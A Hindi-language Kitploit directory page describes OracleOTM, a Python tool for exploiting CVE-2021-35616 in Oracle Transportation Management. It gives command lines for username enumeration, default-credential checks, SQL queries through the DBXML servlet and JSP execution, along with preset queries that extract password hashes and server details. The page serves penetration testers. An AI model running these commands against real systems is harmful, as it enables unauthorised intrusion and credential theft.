Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OracleOTM — CVE-2021-35616 का शोषण करने के लिए Python टूल | Kitploit
उपकरण/GitHubGitHub/ofirhamam/oracleotm
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubofirhamam/oracleotm

OracleOTM

CVE-2021-35616 का शोषण करने के लिए Python टूल

रिपॉजिटरी देखें
11124 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

OracleOTM

CVE-2021-35616 का शोषण करने के लिए Python टूल

स्क्रिप्ट मॉड्यूल में काम करती है, जिन्हें मैंने निम्नलिखित क्रम में लागू किया है:

► उपयोगकर्ता नाम एन्यूमरेशन

► डिफ़ॉल्ट क्रेडेंशियल की खोज

► DBXML सर्वलेट का उपयोग करके SQL क्वेरी चलाना

► पूर्ण शोषण और JSP निष्पादन

स्क्रिप्ट का सिंटैक्स इस प्रकार है:

.\OracleOTM.py {module} {host TXT file} {additional parameters}

उपयोगकर्ता नाम एन्यूमरेशन: .\OracleOTM.py enum {hosts TXT file} -u users.txt

डिफ़ॉल्ट क्रेडेंशियल की खोज: .\OracleOTM.py default {hosts TXT file}

DBXML सर्वलेट का उपयोग करके SQL क्वेरी चलाएँ: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"

मैंने कुछ पूर्व-निर्धारित क्वेरी भी तैयार की हैं जो मुझे उपयोगी लगीं; आप उन्हें सीधे एक्सेस कर सकते हैं, निम्नानुसार:

.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os

root@kitploit:~
OS – सर्वर का OS निकालें 

Osuser – DB चलाने वाले OS उपयोगकर्ता को निकालें

Hostname – DB सर्वर का होस्ट नाम 

Hostip – DB सर्वर का IP पता 

Passwords – OTM उपयोगकर्ताओं और उनके हैश किए गए पासवर्ड निकालता है

 Oraversion – DB संस्करण 

Dbusershash – DB उपयोगकर्ताओं के पासवर्ड हैश

Dbfileslocation – OS में DB फ़ाइलों का स्थान

पूर्ण शोषण और JSP निष्पादन: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"

टूल डाउनलोड करें